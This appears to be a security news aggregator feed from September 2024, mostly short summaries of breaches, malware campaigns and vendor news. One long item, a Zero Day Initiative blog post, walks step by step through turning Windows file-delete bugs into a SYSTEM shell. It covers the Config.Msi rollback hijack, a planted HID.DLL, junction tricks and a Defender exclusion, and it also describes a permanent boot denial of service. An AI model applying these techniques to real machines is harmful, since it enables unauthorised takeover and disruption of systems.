The Japanese Robot Controversy Lurking in Israel’s Military Supply ChainActivists claim Japanese industrial robots are being used to build military equipment for Israel. The robot maker denies the claims, but the episode reveals the complex ethics of global manufacturing.
by WIRED Security News
2024-09-03 23:59:00
Last Week in Security (LWiS) - 2024-09-03argv[0] tampering (@Wietze), Moodle eval() misuse (@RedTeamPT), ntoskrnl.exe PoC (@b1thvn_), 4x wappd exploits (@hyprdude), and more!
by Bad Sector Labs
2024-09-03 22:39:06
California Approves Privacy Bill Requiring Opt-Out ToolsThis bill requires Web browsers to have an easy-to-find (and use) setting for consumers to send an opt-out preference signal by default to every site and app they interact with.
by Dark Reading
2024-09-03 21:33:14
North Korea's ''Citrine Sleet'' APT Exploits Zero-Day Chromium BugMicrosoft warned that the DPRK''s latest innovative tack chains together previously unknown browser issues, then adds a rootkit to the mix to gain deep system access and steal crypto.
by Dark Reading
2024-09-03 21:18:49
City of Columbus Sues Researcher After Ransomware AttackThe Ohio city filed for a restraining order, claiming the researcher was working in tandem with the ransomware attackers.
by Dark Reading
2024-09-03 20:37:20
Halliburton Data Stolen in Oil-Sector CyberattackThe energy kahuna said that operations were disrupted after an attack on its supporting business applications.
by ITPro Today
2024-09-03 20:23:00
Infostealers: A growing threatOne sign of the increasing maturity of the cybercriminal economy is the fast-growing use of infostealers, a category of malware that, as its name suggests, is designed to gather and exfiltrate information from your system.
by Barracuda
2024-09-03 20:21:22
Mitigating insider threats requires constant vigilanceInsider threats are among the most challenging issues any cybersecurity team is likely to encounter. The only way to prevent these types of attacks is to ensure that data access is continuously monitored.
by Barracuda
2024-09-03 19:21:00
U.S. Cyber Command Hosts First Offensive Cyber Flag 2024 ExerciseU.S. Cyber Command has concluded CYBER FLAG 24-2, marking a significant milestone as the first iteration of the exercise to incorporate Offensive Cyberspace Operations, August 30.
by U.S. Cyber Command News
2024-09-03 19:16:55
How to Secure Your Penetration Testing Environment with Full Disk Encryptionby Douglas Berdeaux, Senior Security Consultant   As penetration testers, ensuring the security and integrity of our tools and data is paramount. One key aspect of this is creating a […]
by Red Siege Blog
2024-09-03 19:16:46
🐝 Hive Five 187 - Hacker ModeA roundup of every Hacker Summer Camp AI Talk, Bypassing airport security via SQL injection, Misconception about the nature of work, and more...
by Hive Five
2024-09-03 18:59:00
Hacktivists Exploits WinRAR Vulnerability in Attacks Against Russia and BelarusA hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus. ""Head Mare uses more up-to-date methods for obtaining initial access,"" Kaspersky said in a Monday analysis of the group''s tactics and tools. ""For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which
by The Hacker News
2024-09-03 18:46:10
Organizations in the Middle East Targeted By Malware Impersonating Palo Alto GlobalProtect VPNA social engineering campaign is targeting entities in the Middle East using malware that impersonates Palo Alto Networks’ GlobalProtect VPN, according to researchers at Trend Micro.
by KnowBe4
2024-09-03 18:46:07
Major Scam Operation Uses Deepfake VideosResearchers at Palo Alto Networks’ Unit 42 are tracking dozens of scam campaigns that are using deepfake videos to impersonate CEOs, news anchors, and high-profile government officials.
by KnowBe4
2024-09-03 18:46:00
New Rust-Based Ransomware Cicada3301 Targets Windows and Linux SystemsCybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation. ""It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector,"" cybersecurity
by The Hacker News
2024-09-03 18:25:06
Cyberattackers Spoof Palo Alto VPNs to Spread WikiLoader VariantThe malware, first discovered two years ago, has returned in campaigns using SEO poisoning.
by Dark Reading
2024-09-03 18:18:41
Transatlantic Cable podcast episode 361 | Kaspersky official blogEpisode 361 looks at the right to disconnect, Black Myth: Wukong and much more!
by Kaspersky
2024-09-03 16:54:45
DAST Best Practices for Mobile DevelopersThis blog post will guide you through the essential best practices for integrating DAST into your mobile development process. The post DAST Best Practices for Mobile Developers appeared first on Zimperium.
by Zimperium
2024-09-03 16:38:36
London’s city transport hit by cybersecurity incidentTransport for London (TfL) is apparently fighting a cybersecurity incident but is rather sparing in providing details
by Malwarebytes Labs
2024-09-03 16:09:05
Halliburton Data Stolen in Oil-Sector CyberattackThe energy kahuna said that operations were disrupted after an attack on its supporting business applications.
by Dark Reading
2024-09-03 16:08:03
Evolving npm Package Campaign Targets Roblox Devs, for YearsAttackers have added aggressive social engineering to their arsenal, along with a novel Windows-manipulating persistence mechanism that demands developer vigilance.
by Dark Reading
2024-09-03 15:51:07
Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks (Archive)This version of the blog is preserved for archival purposes only. An updated version of this blog, including links to new PoC code, can be found here. What do you do when you’ve found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we’ll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives. The Trouble with Arbitrary File Deletes When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves: Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!) Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a “fail-open” (degradation of security) if deleted. A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations. Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\Program Data, we’re not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products. The Solution is Found Elsewhere: Windows Installer In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of. To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat. The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth. To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state. In the simplest scenario, the location for these records is a folder named C:\Config.Msi. During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of a file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install. This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files. Here is where an opening arises, though: What if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts. Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well. From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP In conjunction with this article, we are releasing source code for Abdelhamid Naceri’s privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator. The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete. The exploit contains an .msi file. The main thing that’s special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and rollback. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to “restore” it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\). The full mechanism of the EoP exploit is as follows: The EoP creates a dummy C:\Config.Msi and sets an oplock. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further). The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP’s create operation succeeds. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL. Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time. From Arbitrary File Delete to SYSTEM EoP The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri’s User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain. In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW. So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION. Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION. From Folder Contents Delete to SYSTEM EoP Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP? Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows: Create a subfolder, temp\folder1. Create a file, temp\folder1\file1.txt. Set an oplock on temp\folder1\file1.txt. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock. When the oplock triggers, perform the following in the callback:a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.b. Recreate temp\folder1 as a junction to the \RPC Control folder of the object namespace. c. Create a symlink at \RPC Control\file1.txt pointing to C:\Config.Msi::$INDEX_ALLOCATION. When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi. Readers may recognize the symlink technique involving \RPC Control from James Forshaw’s symboliclink-testing-tools. Note, though, that it’s not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing. That’s because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace. For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a “Process” exclusion for FolderContentsDeleteToFolderDelete.exe. You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell. From Arbitrary Folder Create to Permanent DoS Before closing, we’d like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn’t sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. The trick is to create a folder such as this one: C:\Windows\System32\cng.sys Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect. Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file. Conclusion The techniques we’ve presented here show how some rather weak exploit primitives can be used for great effect. We have learned that: • An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service. We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2024-09-03 15:45:49
Sextortion Scams Now Include Photos of Your HomeAn old but persistent email scam known as ""sextortion"" has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target''s home in a bid to make threats about publishing the videos more frightening and convincing.
by Krebs on Security
2024-09-03 15:44:01
CERT-In Advisory and WikiLoader Campaign: Comprehensive Overview of Recent Security ThreatsCERT-In''s advisory on Palo Alto Networks vulnerabilities and WikiLoader’s fake GlobalProtect installers highlight major security risks. Key Takeaways CERT-In has issued a critical advisory highlighting vulnerabilities in multiple Palo Alto Networks applications, including GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. Concurrently, new malware distribution methods involving WikiLoader have been detected, leveraging spoofed GlobalProtect installers. The vulnerabilities identified include privilege escalation (CVE-2024-5915), information disclosure (CVE-2024-5916), and command injection (CVE-2024-5914). WikiLoader, a sophisticated loader, uses advanced evasion techniques such as SEO poisoning to distribute its payload. Specific versions of affected software and newly observed malware tactics require immediate attention. Timely updates and robust defense mechanisms are critical for mitigating these risks. Recommended actions include upgrading affected software, restricting access, using threat detection tools, and staying vigilant against sophisticated malware campaigns like WikiLoader. Overview CERT-In''s recent advisory and the emergence of WikiLoader malware highlight pressing security concerns involving Palo Alto Networks applications and new malware distribution techniques. CERT-In has pinpointed critical vulnerabilities in GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. These vulnerabilities range from privilege escalation and information disclosure to command injection. In parallel, the WikiLoader campaign, which uses fake GlobalProtect installers for malware distribution, illustrates the increasing sophistication of cyber threats. The vulnerabilities span multiple Palo Alto Networks applications, each with varying degrees of impact and risk. The GlobalProtect app for Windows, a widely used tool for secure remote access, is affected across several versions. Specifically, versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x are impacted. Detailed Description of Vulnerabilities and Malware Campaign 1. Privilege Escalation Vulnerability (CVE-2024-5915) CVE-2024-5915 is a local privilege escalation vulnerability found in the GlobalProtect app for Windows. This issue arises from an unspecified error that allows a local user to execute programs with elevated privileges, potentially compromising the entire system. The flaw can enable an attacker who already has local access to gain administrative control over the system, leading to a high risk of system-wide compromise. The vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 5.2. The attack vector is local, which means that the attacker needs physical or remote desktop access to exploit the flaw. The attack complexity is low, indicating that exploiting the vulnerability does not require sophisticated techniques. The impact can be significant, leading to potential breaches of confidentiality, integrity, and availability. The vulnerability impacts GlobalProtect App versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x. Patches and updates are planned, with updates expected by August 2024 for version 6.3.1, November 2024 for 6.0.x, and December 2024 for 5.1.x. Until updates are applied, restricting access to GlobalProtect installation directories and ensuring they are protected from non-administrative modifications is recommended. 2. Information Disclosure Vulnerability (CVE-2024-5916) CVE-2024-5916 is an information disclosure vulnerability affecting PAN-OS and Cloud NGFW. This flaw involves the exposure of sensitive information, such as secrets, passwords, and tokens of external systems, through configuration logs. A read-only administrator with access to these logs could view sensitive data, leading to potential unauthorized access to critical systems. This vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 6.0. The attack vector is network-based, meaning that an attacker can exploit the flaw remotely. The attack complexity is low, and no user interaction is required, making the vulnerability particularly concerning. The primary impact is on confidentiality, though integrity and availability are not directly affected. PAN-OS versions 11.0 < 11.0.4, 10.2 < 10.2.8, and Cloud NGFW versions prior to August 15 on Azure and August 23 on AWS are affected. Organizations should upgrade to PAN-OS 11.0.4, 10.2.8, or later versions and ensure Cloud NGFW is updated to versions released on or after the specified dates. It is also crucial to revoke any compromised credentials to prevent unauthorized access. 3. Command Injection Vulnerability (CVE-2024-5914) CVE-2024-5914 is a command injection vulnerability found in the Cortex XSOAR CommonScripts pack. This issue allows unauthenticated attackers to execute arbitrary commands within the context of an integration container. Command injection vulnerabilities are particularly dangerous as they can be exploited to execute arbitrary commands, potentially leading to severe security breaches. The vulnerability has a HIGH severity rating, with a CVSSv4.0 Base Score of 7.0. The attack vector is network-based, and while the attack complexity is high, the lack of required user interaction makes it a significant threat. The impact includes substantial risks to confidentiality and integrity, with a potential low impact on availability. The vulnerability affects versions of the Cortex XSOAR CommonScripts pack before 1.12.33. To address the issue, upgrade to version 1.12.33 or later. Additionally, removing any integration usage of the ScheduleGenericPolling or GenericPollingScheduledTask scripts can help prevent exploitation. The WikiLoader Malware Campaign WikiLoader is a sophisticated loader that has been observed using advanced evasion techniques to distribute malware. The loader leverages SEO poisoning and fake GlobalProtect installers to deliver its payload. This method involves spoofing legitimate software installers, which increases the likelihood of successful malware delivery. Attackers have utilized SEO poisoning techniques to direct users to spoofed sites, such as bitbucket[.]org, where fake GlobalProtect installers containing WikiLoader components are hosted. This technique capitalizes on the high trust placed in legitimate software sources to trick users into downloading malicious payloads. Upon infection, WikiLoader downloads and extracts additional components executes them and uses legitimate binaries for side-loading. The malware creates persistence on the system through randomized file names and employs various obfuscation methods to avoid detection. WikiLoader includes several anti-analysis measures, such as detecting virtual machine environments to evade sandbox analysis, displaying misleading error messages, and employing obfuscation through randomized folder names. These techniques are designed to hinder detection and analysis by security tools. Recommendations and Mitigations To effectively address the identified vulnerabilities and new malware threats, organizations should implement the following measures: To address the vulnerabilities, apply the latest patches and updates for GlobalProtect, PAN-OS, Cloud NGFW, and Cortex XSOAR. Check for updates regularly and apply them promptly. Limit access to GlobalProtect installation directories and ensure that sensitive credentials in PAN-OS are protected. Revoke any compromised credentials and review access controls to prevent unauthorized access. Implement and configure threat detection tools to monitor for unusual activity and signs of infection. Utilize XQL queries to identify indicators of WikiLoader and other malware behaviors. Provide staff with training and awareness programs on emerging threats and security best practices. Ensure that employees are informed about the risks of downloading software from untrusted sources and the importance of verifying software integrity. Conduct regular vulnerability assessments and scans to identify and address potential security weaknesses. Ensure that all updates and patches are applied in a timely manner. Conclusion The recent CERT-In advisory and the emergence of the WikiLoader malware campaign highlight critical vulnerabilities and evolving cyber threats. The identified vulnerabilities in Palo Alto Networks applications and the sophisticated tactics employed by WikiLoader underscore the need for proactive security measures. By addressing the vulnerabilities through timely updates, restricting access, and employing robust defense mechanisms, organizations can significantly reduce the risk of exploitation. Additionally, staying alert against sophisticated malware campaigns and continuously improving security practices are essential for protecting systems and sensitive data. Implementing the recommended actions will help to protect against these risks and enhance the overall security posture. The post CERT-In Advisory and WikiLoader Campaign: Comprehensive Overview of Recent Security Threats appeared first on Cyble.
by CYBLE
2024-09-03 15:11:59
City of Columbus tries to silence security researcherThe City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature data stolen by a ransomware group
by Malwarebytes Labs
2024-09-03 15:07:00
Rocinante Trojan Poses as Banking Apps to Steal Sensitive Data from Brazilian Android UsersMobile users in Brazil are the target of a new malware campaign that delivers a new Android banking trojan named Rocinante. ""This malware family is capable of performing keylogging using the Accessibility Service, and is also able to steal PII from its victims using phishing screens posing as different banks,"" Dutch security company ThreatFabric said. ""Finally, it can use all this exfiltrated
by The Hacker News
2024-09-03 14:52:12
Introducing the URL validation bypass cheat sheetURL validation bypasses are the root cause of numerous vulnerabilities including many instances of SSRF, CORS misconfiguration, and open redirection. These work by using ambiguous URLs to trigger URL
by PortSwigger Research
2024-09-03 14:50:02
How to export notes from Notion and make an offline backup of your data | Kaspersky official blogA step-by-step guide to backing up Notion notes, and migrating them to free rival apps Obsidian or AFFiNE.
by Kaspersky
2024-09-03 14:19:43
BlackCat Spin-off 'Cicada3301'' Uses Stolen Creds on the Fly, Skirts EDRMalware authors have iterated on one of the premier encryptors on the market, building something even bigger and better.
by Dark Reading
2024-09-03 14:00:00
Improved Software Supply Chain Resilience Equals Increased SecurityUnderstanding through visibility, managing through governance, and anticipating through continuous deployment will better prepare organizations for the next supply chain attack.
by Dark Reading
2024-09-03 13:50:53
September is Preparedness MonthFor Preparedness Month in September, Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, has urged businesses to prepare for the rising tide of cyber threats by prioritising fundamental cybersecurity practices. With more sensitive data being stored online, the risk of breaches and exploitation is at an all-time high. To defend against the most […] The post September is Preparedness Month appeared first on IT Security Guru.
by IT Security Guru
2024-09-03 13:38:00
CVE-2024-27198 explained (TeamCity Auth Bypass)We deep dive into CVE-2024-27198, also known as the JetBrains TeamCity Multiple Authentication Bypass.
by Hack The Box Blog
2024-09-03 13:36:30
The waterproof Blink Mini 2 security camera is the best Wyze Cam alternative availableThe newest version of the Blink Mini features key improvements that make it worthy even for non-budget shoppers.
by ZDNET Security
2024-09-03 13:00:00
Cost of a data breach: Cost savings with law enforcement involvementFor those working in the information security and cybersecurity industries, the technical impacts of a data breach are generally understood. But for those outside of these technical functions, such as executives, operators and business support functions, “explaining” the real impact of a breach can be difficult. Therefore, explaining impacts in terms of quantifiable financial figures […] The post Cost of a data breach: Cost savings with law enforcement involvement appeared first on Security Intelligence.
by Security Intelligence
2024-09-03 13:00:00
Secrets Exposed: Why Your CISO Should Worry About SlackIn the digital realm, secrets (API keys, private keys, username and password combos, etc.) are the keys to the kingdom. But what if those keys were accidentally left out in the open in the very tools we use to collaborate every day? A Single Secret Can Wreak Havoc Imagine this: It''s a typical Tuesday in June 2024. Your dev team is knee-deep in sprints, Jira tickets are flying, and Slack is
by The Hacker News
2024-09-03 12:46:06
Halliburton confirms data was stolen in ongoing cyberattackThe oil and fracking giant says it is ""working to identify effects"" of the ongoing cyberattack on its oil and fracking operations. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-03 12:33:45
Name That Edge Toon: Bug OffFeeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.
by Dark Reading
2024-09-03 12:24:27
Check Point Software Launches New MSSP Portal for Partners: Streamlining Service Delivery and Business OperationsCheck Point® Software Technologies Ltd. today introduced its cutting-edge Portal tailored for managed security service providers (MSSPs) and distributors. This innovative platform streamlines service delivery and simplifies the business experience with Check Point. As highlighted by Canalys, the global MSSP market is expected to expand at an annual rate of 14.2%, fueled by rising cyber […] The post Check Point Software Launches New MSSP Portal for Partners: Streamlining Service Delivery and Business Operations appeared first on IT Security Guru.
by IT Security Guru
2024-09-03 12:21:00
Russian Disinformation Campaign “DoppelGänger” Unmasked: A Web of DeceptionThe European Union’s Disinformation Lab (EU DisinfoLab) has recently exposed a sophisticated Russian influence campaign known as “DoppelGänger.”
by U.S. Cyber Command News
2024-09-03 12:00:25
Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloadsThe threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.
by Cisco Talos Blog
2024-09-03 12:00:00
Your KnowBe4 Compliance Plus Fresh Content Updates from August 2024Check out the August updates in Compliance Plus so you can stay on top of featured compliance training content.
by KnowBe4
2024-09-03 11:45:03
Why Every IT Leader Needs a Team of Trusted AdvisorsSooner or later, every IT leader runs into a virtual brick wall. That''s when it''s helpful to have some trusted colleagues to turn to for advice and support.
by ITPro Today
2024-09-03 11:26:52
Building an Accessible Future in the Private SectorPrivate companies must prioritize digital inclusivity to enhance user experience, protect their reputation, and tap into a broader customer base.
by ITPro Today
2024-09-03 11:07:17
Crushing FUD: Embracing Ethical Hackers to Strengthen CybersecurityCrushing FUD: Embracing Ethical Hackers to Strengthen Cybersecurity Antoine Willia… Tue, 09/03/2024 - 07:58 Body What is FUD?Fear, Uncertainty, and Doubt (FUD), are central blockers to high-efficacy security programs by creating a climate of fear and hesitation, which impedes effective decision-making and proactive measures. The primary goal of FUD is to create anxiety and distrust, which can lead to paralysis in security operations and a defensive rather than a proactive mindset.Examples of FUDHackers Using Reports as Leverage: Companies may worry that hackers will make sensitive security reports public without consent, potentially exposing vulnerabilities before they can be mitigated. Cybercriminals may threaten to release or withhold critical security findings unless a ransom is paid, leveraging fear to coerce companies into compliance.Knocking Assets Offline: The fear of attackers taking critical assets offline or causing general product disruption can paralyze decision-making and lead to overly conservative security practices.Seeing Hackers as Criminals: The stereotype of hackers as solely malicious actors creates fear and mistrust, hindering collaboration with ethical hackers and security researchers.Lack of Trust: General distrust within the security community, whether towards software vendors, security solutions, or even internal teams, exacerbates uncertainty and hinders cooperation.Being Overwhelmed with New Vulnerabilities: The rapid influx of new vulnerabilities can overwhelm security teams without a proper triage, escalation, and remediation process, leading to a sense of helplessness.Exceeding Engineering Capacity to Remediate Vulnerabilities: When the volume of vulnerabilities outpaces the ability of engineering teams to address them, it can create fear of inevitable breaches and system failures.Brand Damage: The fear that any security incident, no matter how minor, will cause irreparable damage to a company’s reputation can lead to excessive risk aversion.Legal Ramifications: Concerns about the legal consequences of breaches, including fines and regulatory actions, can cause a team to create more roadblocks for ethical hackers during testing.Why FUD is Hindering Security Programs FUD significantly hinders cybersecurity programs by creating a paralyzing environment where decision-makers become overly cautious, leading to delays in implementing necessary security measures. This fear-driven inaction leaves organizations vulnerable to preventable attacks. Additionally, FUD often results in the misallocation of resources, as companies may invest heavily in less effective security measures out of fear, diverting critical resources away from more impactful solutions. The pervasive sense of fear and uncertainty erodes trust within the organization and with external partners, hampering collaboration and information sharing that are essential for effective cybersecurity.Moreover, the constant pressure of dealing with FUD can lead to burnout and low morale among security professionals, decreasing overall productivity and effectiveness. This environment stifles innovation, as 